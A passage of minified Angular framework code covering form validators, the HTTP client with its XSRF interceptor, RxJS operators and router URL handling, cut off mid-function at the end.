value(e){this._select?(this._value=e,this._setElementValue(SN(this.id,e)),this._select.writeValue(this._select.value)):this._setElementValue(e)}_setElementValue(e){this._renderer.setProperty(this._element.nativeElement,"value",e)}_setSelected(e){this._renderer.setProperty(this._element.nativeElement,"selected",e)}ngOnDestroy(){this._select&&(this._select._optionMap.delete(this.id),this._select.writeValue(this._select.value))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(wr),Ee(dx,9))},t.\u0275dir=Ot({type:t,selectors:[["option"]],inputs:{ngValue:"ngValue",value:"value"}}),t})();function PN(t){return"number"==typeof t?t:parseFloat(t)}let mg=(()=>{class t{constructor(){this._validator=E4}ngOnChanges(e){if(this.inputName in e){const i=this.normalizeInput(e[this.inputName].currentValue);this._enabled=this.enabled(i),this._validator=this._enabled?this.createValidator(i):E4,this._onChange&&this._onChange()}}validate(e){return this._validator(e)}registerOnValidatorChange(e){this._onChange=e}enabled(e){return null!=e}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,features:[sa]}),t})();const qde={provide:Cs,useExisting:ja(()=>mx),multi:!0};let mx=(()=>{class t extends mg{constructor(){super(...arguments),this.inputName="max",this.normalizeInput=e=>PN(e),this.createValidator=e=>HO(e)}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["input","type","number","max","","formControlName",""],["input","type","number","max","","formControl",""],["input","type","number","max","","ngModel",""]],hostVars:1,hostBindings:function(e,i){2&e&&Rt("max",i._enabled?i.max:null)},inputs:{max:"max"},features:[ki([qde]),ci]}),t})();const Gde={provide:Cs,useExisting:ja(()=>Ed),multi:!0};let Ed=(()=>{class t extends mg{constructor(){super(...arguments),this.inputName="min",this.normalizeInput=e=>PN(e),this.createValidator=e=>BO(e)}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["input","type","number","min","","formControlName",""],["input","type","number","min","","formControl",""],["input","type","number","min","","ngModel",""]],hostVars:1,hostBindings:function(e,i){2&e&&Rt("min",i._enabled?i.min:null)},inputs:{min:"min"},features:[ki([Gde]),ci]}),t})();const jde={provide:Cs,useExisting:ja(()=>gm),multi:!0};let gm=(()=>{class t extends mg{constructor(){super(...arguments),this.inputName="required",this.normalizeInput=Eh,this.createValidator=e=>UO}enabled(e){return e}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","required","","formControlName","",3,"type","checkbox"],["","required","","formControl","",3,"type","checkbox"],["","required","","ngModel","",3,"type","checkbox"]],hostVars:1,hostBindings:function(e,i){2&e&&Rt("required",i._enabled?"":null)},inputs:{required:"required"},features:[ki([jde]),ci]}),t})(),WN=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[DN]}),t})(),z4=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[WN]}),t})(),ux=(()=>{class t{static withConfig(e){return{ngModule:t,providers:[{provide:rx,useValue:e.warnOnNgModelWithFormControl}]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[WN]}),t})();function Bi(...t){return Sa(t,Vn(t))}function Rh(t,a){return ie(a)?Ut(t,a,1):Ut(t,1)}function Dn(t,a){return Ie((e,i)=>{let n=0;e.subscribe(Ae(i,r=>t.call(a,r,n++)&&i.next(r)))})}class FN{}class VN{}class du{constructor(a){this.normalizedNames=new Map,this.lazyUpdate=null,a?this.lazyInit="string"==typeof a?()=>{this.headers=new Map,a.split("\n").forEach(e=>{const i=e.indexOf(":");if(i>0){const n=e.slice(0,i),r=n.toLowerCase(),c=e.slice(i+1).trim();this.maybeSetNormalizedName(n,r),this.headers.has(r)?this.headers.get(r).push(c):this.headers.set(r,[c])}})}:()=>{this.headers=new Map,Object.keys(a).forEach(e=>{let i=a[e];const n=e.toLowerCase();"string"==typeof i&&(i=[i]),i.length>0&&(this.headers.set(n,i),this.maybeSetNormalizedName(e,n))})}:this.headers=new Map}has(a){return this.init(),this.headers.has(a.toLowerCase())}get(a){this.init();const e=this.headers.get(a.toLowerCase());return e&&e.length>0?e[0]:null}keys(){return this.init(),Array.from(this.normalizedNames.values())}getAll(a){return this.init(),this.headers.get(a.toLowerCase())||null}append(a,e){return this.clone({name:a,value:e,op:"a"})}set(a,e){return this.clone({name:a,value:e,op:"s"})}delete(a,e){return this.clone({name:a,value:e,op:"d"})}maybeSetNormalizedName(a,e){this.normalizedNames.has(e)||this.normalizedNames.set(e,a)}init(){this.lazyInit&&(this.lazyInit instanceof du?this.copyFrom(this.lazyInit):this.lazyInit(),this.lazyInit=null,this.lazyUpdate&&(this.lazyUpdate.forEach(a=>this.applyUpdate(a)),this.lazyUpdate=null))}copyFrom(a){a.init(),Array.from(a.headers.keys()).forEach(e=>{this.headers.set(e,a.headers.get(e)),this.normalizedNames.set(e,a.normalizedNames.get(e))})}clone(a){const e=new du;return e.lazyInit=this.lazyInit&&this.lazyInit instanceof du?this.lazyInit:this,e.lazyUpdate=(this.lazyUpdate||[]).concat([a]),e}applyUpdate(a){const e=a.name.toLowerCase();switch(a.op){case"a":case"s":let i=a.value;if("string"==typeof i&&(i=[i]),0===i.length)return;this.maybeSetNormalizedName(a.name,e);const n=("a"===a.op?this.headers.get(e):void 0)||[];n.push(...i),this.headers.set(e,n);break;case"d":const r=a.value;if(r){let c=this.headers.get(e);if(!c)return;c=c.filter(d=>-1===r.indexOf(d)),0===c.length?(this.headers.delete(e),this.normalizedNames.delete(e)):this.headers.set(e,c)}else this.headers.delete(e),this.normalizedNames.delete(e)}}forEach(a){this.init(),Array.from(this.normalizedNames.keys()).forEach(e=>a(this.normalizedNames.get(e),this.headers.get(e)))}}class Zde{encodeKey(a){return BN(a)}encodeValue(a){return BN(a)}decodeKey(a){return decodeURIComponent(a)}decodeValue(a){return decodeURIComponent(a)}}const tme=/%(\d[a-f0-9])/gi,ime={40:"@","3A":":",24:"$","2C":",","3B":";","3D":"=","3F":"?","2F":"/"};function BN(t){return encodeURIComponent(t).replace(tme,(a,e)=>{var i;return null!==(i=ime[e])&&void 0!==i?i:a})}function W4(t){return`${t}`}class op{constructor(a={}){if(this.updates=null,this.cloneFrom=null,this.encoder=a.encoder||new Zde,a.fromString){if(a.fromObject)throw new Error("Cannot specify both fromString and fromObject.");this.map=function eme(t,a){const e=new Map;return t.length>0&&t.replace(/^\?/,"").split("&").forEach(n=>{const r=n.indexOf("="),[c,d]=-1==r?[a.decodeKey(n),""]:[a.decodeKey(n.slice(0,r)),a.decodeValue(n.slice(r+1))],T=e.get(c)||[];T.push(d),e.set(c,T)}),e}(a.fromString,this.encoder)}else a.fromObject?(this.map=new Map,Object.keys(a.fromObject).forEach(e=>{const i=a.fromObject[e],n=Array.isArray(i)?i.map(W4):[W4(i)];this.map.set(e,n)})):this.map=null}has(a){return this.init(),this.map.has(a)}get(a){this.init();const e=this.map.get(a);return e?e[0]:null}getAll(a){return this.init(),this.map.get(a)||null}keys(){return this.init(),Array.from(this.map.keys())}append(a,e){return this.clone({param:a,value:e,op:"a"})}appendAll(a){const e=[];return Object.keys(a).forEach(i=>{const n=a[i];Array.isArray(n)?n.forEach(r=>{e.push({param:i,value:r,op:"a"})}):e.push({param:i,value:n,op:"a"})}),this.clone(e)}set(a,e){return this.clone({param:a,value:e,op:"s"})}delete(a,e){return this.clone({param:a,value:e,op:"d"})}toString(){return this.init(),this.keys().map(a=>{const e=this.encoder.encodeKey(a);return this.map.get(a).map(i=>e+"="+this.encoder.encodeValue(i)).join("&")}).filter(a=>""!==a).join("&")}clone(a){const e=new op({encoder:this.encoder});return e.cloneFrom=this.cloneFrom||this,e.updates=(this.updates||[]).concat(a),e}init(){null===this.map&&(this.map=new Map),null!==this.cloneFrom&&(this.cloneFrom.init(),this.cloneFrom.keys().forEach(a=>this.map.set(a,this.cloneFrom.map.get(a))),this.updates.forEach(a=>{switch(a.op){case"a":case"s":const e=("a"===a.op?this.map.get(a.param):void 0)||[];e.push(W4(a.value)),this.map.set(a.param,e);break;case"d":if(void 0===a.value){this.map.delete(a.param);break}{let i=this.map.get(a.param)||[];const n=i.indexOf(W4(a.value));-1!==n&&i.splice(n,1),i.length>0?this.map.set(a.param,i):this.map.delete(a.param)}}}),this.cloneFrom=this.updates=null)}}class ame{constructor(){this.map=new Map}set(a,e){return this.map.set(a,e),this}get(a){return this.map.has(a)||this.map.set(a,a.defaultValue()),this.map.get(a)}delete(a){return this.map.delete(a),this}has(a){return this.map.has(a)}keys(){return this.map.keys()}}function HN(t){return"undefined"!=typeof ArrayBuffer&&t instanceof ArrayBuffer}function UN(t){return"undefined"!=typeof Blob&&t instanceof Blob}function qN(t){return"undefined"!=typeof FormData&&t instanceof FormData}class Cy{constructor(a,e,i,n){let r;if(this.url=e,this.body=null,this.reportProgress=!1,this.withCredentials=!1,this.responseType="json",this.method=a.toUpperCase(),function nme(t){switch(t){case"DELETE":case"GET":case"HEAD":case"OPTIONS":case"JSONP":return!1;default:return!0}}(this.method)||n?(this.body=void 0!==i?i:null,r=n):r=i,r&&(this.reportProgress=!!r.reportProgress,this.withCredentials=!!r.withCredentials,r.responseType&&(this.responseType=r.responseType),r.headers&&(this.headers=r.headers),r.context&&(this.context=r.context),r.params&&(this.params=r.params)),this.headers||(this.headers=new du),this.context||(this.context=new ame),this.params){const c=this.params.toString();if(0===c.length)this.urlWithParams=e;else{const d=e.indexOf("?");this.urlWithParams=e+(-1===d?"?":d<e.length-1?"&":"")+c}}else this.params=new op,this.urlWithParams=e}serializeBody(){return null===this.body?null:HN(this.body)||UN(this.body)||qN(this.body)||function ome(t){return"undefined"!=typeof URLSearchParams&&t instanceof URLSearchParams}(this.body)||"string"==typeof this.body?this.body:this.body instanceof op?this.body.toString():"object"==typeof this.body||"boolean"==typeof this.body||Array.isArray(this.body)?JSON.stringify(this.body):this.body.toString()}detectContentTypeHeader(){return null===this.body||qN(this.body)?null:UN(this.body)?this.body.type||null:HN(this.body)?null:"string"==typeof this.body?"text/plain":this.body instanceof op?"application/x-www-form-urlencoded;charset=UTF-8":"object"==typeof this.body||"number"==typeof this.body||"boolean"==typeof this.body?"application/json":null}clone(a={}){var e;const i=a.method||this.method,n=a.url||this.url,r=a.responseType||this.responseType,c=void 0!==a.body?a.body:this.body,d=void 0!==a.withCredentials?a.withCredentials:this.withCredentials,T=void 0!==a.reportProgress?a.reportProgress:this.reportProgress;let k=a.headers||this.headers,q=a.params||this.params;const Y=null!==(e=a.context)&&void 0!==e?e:this.context;return void 0!==a.setHeaders&&(k=Object.keys(a.setHeaders).reduce((te,pe)=>te.set(pe,a.setHeaders[pe]),k)),a.setParams&&(q=Object.keys(a.setParams).reduce((te,pe)=>te.set(pe,a.setParams[pe]),q)),new Cy(i,n,c,{params:q,headers:k,context:Y,reportProgress:T,responseType:r,withCredentials:d})}}var ys=(()=>((ys=ys||{})[ys.Sent=0]="Sent",ys[ys.UploadProgress=1]="UploadProgress",ys[ys.ResponseHeader=2]="ResponseHeader",ys[ys.DownloadProgress=3]="DownloadProgress",ys[ys.Response=4]="Response",ys[ys.User=5]="User",ys))();class hx{constructor(a,e=200,i="OK"){this.headers=a.headers||new du,this.status=void 0!==a.status?a.status:e,this.statusText=a.statusText||i,this.url=a.url||null,this.ok=this.status>=200&&this.status<300}}class fx extends hx{constructor(a={}){super(a),this.type=ys.ResponseHeader}clone(a={}){return new fx({headers:a.headers||this.headers,status:void 0!==a.status?a.status:this.status,statusText:a.statusText||this.statusText,url:a.url||this.url||void 0})}}class F4 extends hx{constructor(a={}){super(a),this.type=ys.Response,this.body=void 0!==a.body?a.body:null}clone(a={}){return new F4({body:void 0!==a.body?a.body:this.body,headers:a.headers||this.headers,status:void 0!==a.status?a.status:this.status,statusText:a.statusText||this.statusText,url:a.url||this.url||void 0})}}class GN extends hx{constructor(a){super(a,0,"Unknown Error"),this.name="HttpErrorResponse",this.ok=!1,this.message=this.status>=200&&this.status<300?`Http failure during parsing for ${a.url||"(unknown url)"}`:`Http failure response for ${a.url||"(unknown url)"}: ${a.status} ${a.statusText}`,this.error=a.error||null}}function px(t,a){return{body:a,headers:t.headers,context:t.context,observe:t.observe,params:t.params,reportProgress:t.reportProgress,responseType:t.responseType,withCredentials:t.withCredentials}}let rp=(()=>{class t{constructor(e){this.handler=e}request(e,i,n={}){let r;if(e instanceof Cy)r=e;else{let T,k;T=n.headers instanceof du?n.headers:new du(n.headers),n.params&&(k=n.params instanceof op?n.params:new op({fromObject:n.params})),r=new Cy(e,i,void 0!==n.body?n.body:null,{headers:T,context:n.context,params:k,reportProgress:n.reportProgress,responseType:n.responseType||"json",withCredentials:n.withCredentials})}const c=Bi(r).pipe(Rh(T=>this.handler.handle(T)));if(e instanceof Cy||"events"===n.observe)return c;const d=c.pipe(Dn(T=>T instanceof F4));switch(n.observe||"body"){case"body":switch(r.responseType){case"arraybuffer":return d.pipe(Xe(T=>{if(null!==T.body&&!(T.body instanceof ArrayBuffer))throw new Error("Response is not an ArrayBuffer.");return T.body}));case"blob":return d.pipe(Xe(T=>{if(null!==T.body&&!(T.body instanceof Blob))throw new Error("Response is not a Blob.");return T.body}));case"text":return d.pipe(Xe(T=>{if(null!==T.body&&"string"!=typeof T.body)throw new Error("Response is not a string.");return T.body}));default:return d.pipe(Xe(T=>T.body))}case"response":return d;default:throw new Error(`Unreachable: unhandled observe type ${n.observe}}`)}}delete(e,i={}){return this.request("DELETE",e,i)}get(e,i={}){return this.request("GET",e,i)}head(e,i={}){return this.request("HEAD",e,i)}jsonp(e,i){return this.request("JSONP",e,{params:(new op).append(i,"JSONP_CALLBACK"),observe:"body",responseType:"json"})}options(e,i={}){return this.request("OPTIONS",e,i)}patch(e,i,n={}){return this.request("PATCH",e,px(n,i))}post(e,i,n={}){return this.request("POST",e,px(n,i))}put(e,i,n={}){return this.request("PUT",e,px(n,i))}}return t.\u0275fac=function(e){return new(e||t)(At(FN))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class jN{constructor(a,e){this.next=a,this.interceptor=e}handle(a){return this.interceptor.intercept(a,this.next)}}const QN=new ni("HTTP_INTERCEPTORS");let rme=(()=>{class t{intercept(e,i){return i.handle(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const sme=/^\)\]\}',?\n/;let $N=(()=>{class t{constructor(e){this.xhrFactory=e}handle(e){if("JSONP"===e.method)throw new Error("Attempted to construct Jsonp request without HttpClientJsonpModule installed.");return new G(i=>{const n=this.xhrFactory.build();if(n.open(e.method,e.urlWithParams),e.withCredentials&&(n.withCredentials=!0),e.headers.forEach((pe,Re)=>n.setRequestHeader(pe,Re.join(","))),e.headers.has("Accept")||n.setRequestHeader("Accept","application/json, text/plain, */*"),!e.headers.has("Content-Type")){const pe=e.detectContentTypeHeader();null!==pe&&n.setRequestHeader("Content-Type",pe)}if(e.responseType){const pe=e.responseType.toLowerCase();n.responseType="json"!==pe?pe:"text"}const r=e.serializeBody();let c=null;const d=()=>{if(null!==c)return c;const pe=n.statusText||"OK",Re=new du(n.getAllResponseHeaders()),Fe=function cme(t){return"responseURL"in t&&t.responseURL?t.responseURL:/^X-Request-URL:/m.test(t.getAllResponseHeaders())?t.getResponseHeader("X-Request-URL"):null}(n)||e.url;return c=new fx({headers:Re,status:n.status,statusText:pe,url:Fe}),c},T=()=>{let{headers:pe,status:Re,statusText:Fe,url:Ne}=d(),et=null;204!==Re&&(et=void 0===n.response?n.responseText:n.response),0===Re&&(Re=et?200:0);let ut=Re>=200&&Re<300;if("json"===e.responseType&&"string"==typeof et){const Ze=et;et=et.replace(sme,"");try{et=""!==et?JSON.parse(et):null}catch(yt){et=Ze,ut&&(ut=!1,et={error:yt,text:et})}}ut?(i.next(new F4({body:et,headers:pe,status:Re,statusText:Fe,url:Ne||void 0})),i.complete()):i.error(new GN({error:et,headers:pe,status:Re,statusText:Fe,url:Ne||void 0}))},k=pe=>{const{url:Re}=d(),Fe=new GN({error:pe,status:n.status||0,statusText:n.statusText||"Unknown Error",url:Re||void 0});i.error(Fe)};let q=!1;const Y=pe=>{q||(i.next(d()),q=!0);let Re={type:ys.DownloadProgress,loaded:pe.loaded};pe.lengthComputable&&(Re.total=pe.total),"text"===e.responseType&&!!n.responseText&&(Re.partialText=n.responseText),i.next(Re)},te=pe=>{let Re={type:ys.UploadProgress,loaded:pe.loaded};pe.lengthComputable&&(Re.total=pe.total),i.next(Re)};return n.addEventListener("load",T),n.addEventListener("error",k),n.addEventListener("timeout",k),n.addEventListener("abort",k),e.reportProgress&&(n.addEventListener("progress",Y),null!==r&&n.upload&&n.upload.addEventListener("progress",te)),n.send(r),i.next({type:ys.Sent}),()=>{n.removeEventListener("error",k),n.removeEventListener("abort",k),n.removeEventListener("load",T),n.removeEventListener("timeout",k),e.reportProgress&&(n.removeEventListener("progress",Y),null!==r&&n.upload&&n.upload.removeEventListener("progress",te)),n.readyState!==n.DONE&&n.abort()}})}}return t.\u0275fac=function(e){return new(e||t)(At(AP))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const _x=new ni("XSRF_COOKIE_NAME"),gx=new ni("XSRF_HEADER_NAME");class KN{}let lme=(()=>{class t{constructor(e,i,n){this.doc=e,this.platform=i,this.cookieName=n,this.lastCookieString="",this.lastToken=null,this.parseCount=0}getToken(){if("server"===this.platform)return null;const e=this.doc.cookie||"";return e!==this.lastCookieString&&(this.parseCount++,this.lastToken=uP(e,this.cookieName),this.lastCookieString=e),this.lastToken}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(lm),At(_x))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),Cx=(()=>{class t{constructor(e,i){this.tokenService=e,this.headerName=i}intercept(e,i){const n=e.url.toLowerCase();if("GET"===e.method||"HEAD"===e.method||n.startsWith("http://")||n.startsWith("https://"))return i.handle(e);const r=this.tokenService.getToken();return null!==r&&!e.headers.has(this.headerName)&&(e=e.clone({headers:e.headers.set(this.headerName,r)})),i.handle(e)}}return t.\u0275fac=function(e){return new(e||t)(At(KN),At(gx))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),dme=(()=>{class t{constructor(e,i){this.backend=e,this.injector=i,this.chain=null}handle(e){if(null===this.chain){const i=this.injector.get(QN,[]);this.chain=i.reduceRight((n,r)=>new jN(n,r),this.backend)}return this.chain.handle(e)}}return t.\u0275fac=function(e){return new(e||t)(At(VN),At(Ko))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),mme=(()=>{class t{static disable(){return{ngModule:t,providers:[{provide:Cx,useClass:rme}]}}static withOptions(e={}){return{ngModule:t,providers:[e.cookieName?{provide:_x,useValue:e.cookieName}:[],e.headerName?{provide:gx,useValue:e.headerName}:[]]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[Cx,{provide:QN,useExisting:Cx,multi:!0},{provide:KN,useClass:lme},{provide:_x,useValue:"XSRF-TOKEN"},{provide:gx,useValue:"X-XSRF-TOKEN"}]}),t})(),ume=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[rp,{provide:FN,useClass:dme},$N,{provide:VN,useExisting:$N}],imports:[mme.withOptions({cookieName:"XSRF-TOKEN",headerName:"X-XSRF-TOKEN"})]}),t})(),hme=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn]}),t})();class zs extends J{constructor(a){super(),this._value=a}get value(){return this.getValue()}_subscribe(a){const e=super._subscribe(a);return!e.closed&&a.next(this._value),e}getValue(){const{hasError:a,thrownError:e,_value:i}=this;if(a)throw e;return this._throwIfClosed(),i}next(a){super.next(this._value=a)}}const V4=j(t=>function(){t(this),this.name="EmptyError",this.message="no elements in sequence"});function ug(...t){const a=Vn(t),e=yo(t),{args:i,keys:n}=LO(t);if(0===i.length)return Sa([],a);const r=new G(function fme(t,a,e=A){return i=>{XN(a,()=>{const{length:n}=t,r=new Array(n);let c=n,d=n;for(let T=0;T<n;T++)XN(a,()=>{const k=Sa(t[T],a);let q=!1;k.subscribe(Ae(i,Y=>{r[T]=Y,q||(q=!0,d--),d||i.next(e(r.slice()))},()=>{--c||i.complete()}))},i)},i)}}(i,a,n?c=>zO(n,c):A));return e?r.pipe(Q6(e)):r}function XN(t,a,e){t?$t(e,t,a):a()}function hg(...t){return function pme(){return Yt(1)}()(Sa(t,Vn(t)))}function sp(t){return new G(a=>{pn(t()).subscribe(a)})}function b1(t,a){const e=ie(t)?t:()=>t,i=n=>n.error(e());return new G(a?n=>a.schedule(i,0,n):i)}function yx(){return Ie((t,a)=>{let e=null;t._refCount++;const i=Ae(a,void 0,void 0,void 0,()=>{if(!t||t._refCount<=0||0<--t._refCount)return void(e=null);const n=t._connection,r=e;e=null,n&&(!r||n===r)&&n.unsubscribe(),a.unsubscribe()});t.subscribe(i),i.closed||(e=t.connect())})}class bx extends G{constructor(a,e){super(),this.source=a,this.subjectFactory=e,this._subject=null,this._refCount=0,this._connection=null,ue(a)&&(this.lift=a.lift)}_subscribe(a){return this.getSubject().subscribe(a)}getSubject(){const a=this._subject;return(!a||a.isStopped)&&(this._subject=this.subjectFactory()),this._subject}_teardown(){this._refCount=0;const{_connection:a}=this;this._subject=this._connection=null,null==a||a.unsubscribe()}connect(){let a=this._connection;if(!a){a=this._connection=new I;const e=this.getSubject();a.add(this.source.subscribe(Ae(e,void 0,()=>{this._teardown(),e.complete()},i=>{this._teardown(),e.error(i)},()=>this._teardown()))),a.closed&&(this._connection=null,a=I.EMPTY)}return a}refCount(){return yx()(this)}}function Ur(t,a){return Ie((e,i)=>{let n=null,r=0,c=!1;const d=()=>c&&!n&&i.complete();e.subscribe(Ae(i,T=>{null==n||n.unsubscribe();let k=0;const q=r++;pn(t(T,q)).subscribe(n=Ae(i,Y=>i.next(a?a(T,Y,q,k++):Y),()=>{n=null,d()}))},()=>{c=!0,d()}))})}function Cn(t){return t<=0?()=>ua:Ie((a,e)=>{let i=0;a.subscribe(Ae(e,n=>{++i<=t&&(e.next(n),t<=i&&e.complete())}))})}function Ro(...t){const a=Vn(t);return Ie((e,i)=>{(a?hg(t,e,a):hg(t,e)).subscribe(i)})}function B4(t){return Ie((a,e)=>{let i=!1;a.subscribe(Ae(e,n=>{i=!0,e.next(n)},()=>{i||e.next(t),e.complete()}))})}function YN(t=_me){return Ie((a,e)=>{let i=!1;a.subscribe(Ae(e,n=>{i=!0,e.next(n)},()=>i?e.complete():e.error(t())))})}function _me(){return new V4}function Dd(t,a){const e=arguments.length>=2;return i=>i.pipe(t?Dn((n,r)=>t(n,r,i)):A,Cn(1),e?B4(a):YN(()=>new V4))}function qr(t,a,e){const i=ie(t)||a||e?{next:t,error:a,complete:e}:t;return i?Ie((n,r)=>{var c;null===(c=i.subscribe)||void 0===c||c.call(i);let d=!0;n.subscribe(Ae(r,T=>{var k;null===(k=i.next)||void 0===k||k.call(i,T),r.next(T)},()=>{var T;d=!1,null===(T=i.complete)||void 0===T||T.call(i),r.complete()},T=>{var k;d=!1,null===(k=i.error)||void 0===k||k.call(i,T),r.error(T)},()=>{var T,k;d&&(null===(T=i.unsubscribe)||void 0===T||T.call(i)),null===(k=i.finalize)||void 0===k||k.call(i)}))}):A}function Sh(t){return Ie((a,e)=>{let r,i=null,n=!1;i=a.subscribe(Ae(e,void 0,void 0,c=>{r=pn(t(c,Sh(t)(a))),i?(i.unsubscribe(),i=null,r.subscribe(e)):n=!0})),n&&(i.unsubscribe(),i=null,r.subscribe(e))})}function gme(t,a,e,i,n){return(r,c)=>{let d=e,T=a,k=0;r.subscribe(Ae(c,q=>{const Y=k++;T=d?t(T,q,Y):(d=!0,q),i&&c.next(T)},n&&(()=>{d&&c.next(T),c.complete()})))}}function JN(t,a){return Ie(gme(t,a,arguments.length>=2,!0))}function Mx(t){return t<=0?()=>ua:Ie((a,e)=>{let i=[];a.subscribe(Ae(e,n=>{i.push(n),t<i.length&&i.shift()},()=>{for(const n of i)e.next(n);e.complete()},void 0,()=>{i=null}))})}function ZN(t,a){const e=arguments.length>=2;return i=>i.pipe(t?Dn((n,r)=>t(n,r,i)):A,Mx(1),e?B4(a):YN(()=>new V4))}function eL(t,a=!1){return Ie((e,i)=>{let n=0;e.subscribe(Ae(i,r=>{const c=t(r,n++);(c||a)&&i.next(r),!c&&i.complete()}))})}function H4(t){return Xe(()=>t)}function U4(t){return Ie((a,e)=>{try{a.subscribe(e)}finally{e.add(t)}})}const Nn="primary",yy=Symbol("RouteTitle");class Cme{constructor(a){this.params=a||{}}has(a){return Object.prototype.hasOwnProperty.call(this.params,a)}get(a){if(this.has(a)){const e=this.params[a];return Array.isArray(e)?e[0]:e}return null}getAll(a){if(this.has(a)){const e=this.params[a];return Array.isArray(e)?e:[e]}return[]}get keys(){return Object.keys(this.params)}}function M1(t){return new Cme(t)}function yme(t,a,e){const i=e.path.split("/");if(i.length>t.length||"full"===e.pathMatch&&(a.hasChildren()||i.length<t.length))return null;const n={};for(let r=0;r<i.length;r++){const c=i[r],d=t[r];if(c.startsWith(":"))n[c.substring(1)]=d;else if(c!==d.path)return null}return{consumed:t.slice(0,i.length),posParams:n}}function mu(t,a){const e=t?Object.keys(t):void 0,i=a?Object.keys(a):void 0;if(!e||!i||e.length!=i.length)return!1;let n;for(let r=0;r<e.length;r++)if(n=e[r],!tL(t[n],a[n]))return!1;return!0}function tL(t,a){if(Array.isArray(t)&&Array.isArray(a)){if(t.length!==a.length)return!1;const e=[...t].sort(),i=[...a].sort();return e.every((n,r)=>i[r]===n)}return t===a}function iL(t){return Array.prototype.concat.apply([],t)}function aL(t){return t.length>0?t[t.length-1]:null}function oc(t,a){for(const e in t)t.hasOwnProperty(e)&&a(t[e],e)}function cp(t){return fD(t)?t:qC(t)?Sa(Promise.resolve(t)):Bi(t)}const vme={exact:function rL(t,a,e){if(!pg(t.segments,a.segments)||!q4(t.segments,a.segments,e)||t.numberOfChildren!==a.numberOfChildren)return!1;for(const i in a.children)if(!t.children[i]||!rL(t.children[i],a.children[i],e))return!1;return!0},subset:sL},nL={exact:function Ame(t,a){return mu(t,a)},subset:function Tme(t,a){return Object.keys(a).length<=Object.keys(t).length&&Object.keys(a).every(e=>tL(t[e],a[e]))},ignored:()=>!0};function oL(t,a,e){return vme[e.paths](t.root,a.root,e.matrixParams)&&nL[e.queryParams](t.queryParams,a.queryParams)&&!("exact"===e.fragment&&t.fragment!==a.fragment)}function sL(t,a,e){return cL(t,a,a.segments,e)}function cL(t,a,e,i){if(t.segments.length>e.length){const n=t.segments.slice(0,e.length);return!(!pg(n,e)||a.hasChildren()||!q4(n,e,i))}if(t.segments.length===e.length){if(!pg(t.segments,e)||!q4(t.segments,e,i))return!1;for(const n in a.children)if(!t.children[n]||!sL(t.children[n],a.children[n],i))return!1;return!0}{const n=e.slice(0,t.segments.length),r=e.slice(t.segments.length);return!!(pg(t.segments,n)&&q4(t.segments,n,i)&&t.children[Nn])&&cL(t.children[Nn],a,r,i)}}function q4(t,a,e){return a.every((i,n)=>nL[e](t[n].parameters,i.parameters))}class fg{constructor(a,e,i){this.root=a,this.queryParams=e,this.fragment=i}get queryParamMap(){return this._queryParamMap||(this._queryParamMap=M1(this.queryParams)),this._queryParamMap}toString(){return xme.serialize(this)}}class qn{constructor(a,e){this.segments=a,this.children=e,this.parent=null,oc(e,(i,n)=>i.parent=this)}hasChildren(){return this.numberOfChildren>0}get numberOfChildren(){return Object.keys(this.children).length}toString(){return G4(this)}}class by{constructor(a,e){this.path=a,this.parameters=e}get parameterMap(){return this._parameterMap||(this._parameterMap=M1(this.parameters)),this._parameterMap}toString(){return uL(this)}}function pg(t,a){return t.length===a.length&&t.every((e,i)=>e.path===a[i].path)}let lL=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:function(){return new Ax},providedIn:"root"}),t})();class Ax{parse(a){const e=new Lme(a);return new fg(e.parseRootSegment(),e.parseQueryParams(),e.parseFragment())}serialize(a){const e=`/${My(a.root,!0)}`,i=function Rme(t){const a=Object.keys(t).map(e=>{const i=t[e];return Array.isArray(i)?i.map(n=>`${j4(e)}=${j4(n)}`).join("&"):`${j4(e)}=${j4(i)}`}).filter(e=>!!e);return a.length?`?${a.join("&")}`:""}(a.queryParams);return`${e}${i}${"string"==typeof a.fragment?`#${function wme(t){return encodeURI(t)}(a.fragment)}`:""}`}}const xme=new Ax;function G4(t){return t.segments.map(a=>uL(a)).join("/")}function My(t,a){if(!t.hasChildren())return G4(t);if(a){const e=t.children[Nn]?My(t.children[Nn],!1):"",i=[];return oc(t.children,(n,r)=>{r!==Nn&&i.push(`${r}:${My(n,!1)}`)}),i.length>0?`${e}(${i.join("//")})`:e}{const e=function Dme(t,a){let e=[];return oc(t.children,(i,n)=>{n===Nn&&(e=e.concat(a(i,n)))}),oc(t.children,(i,n)=>{n!==Nn&&(e=e.concat(a(i,n)))}),e}(t,(i,n)=>n===Nn?[My(t.children[Nn],!1)]:[`${n}:${My(i,!1)}`]);return 1===Object.keys(t.children).length&&null!=t.children[Nn]?`${G4(t)}/${e[0]}`:`${G4(t)}/(${e.join("//")})`}}function dL(t){return encodeURIComponent(t).replace(/%40/g,"@").replace(/%3A/gi,":").replace(/%24/g,"$").replace(/%2C/gi,",")}function j4(t){return 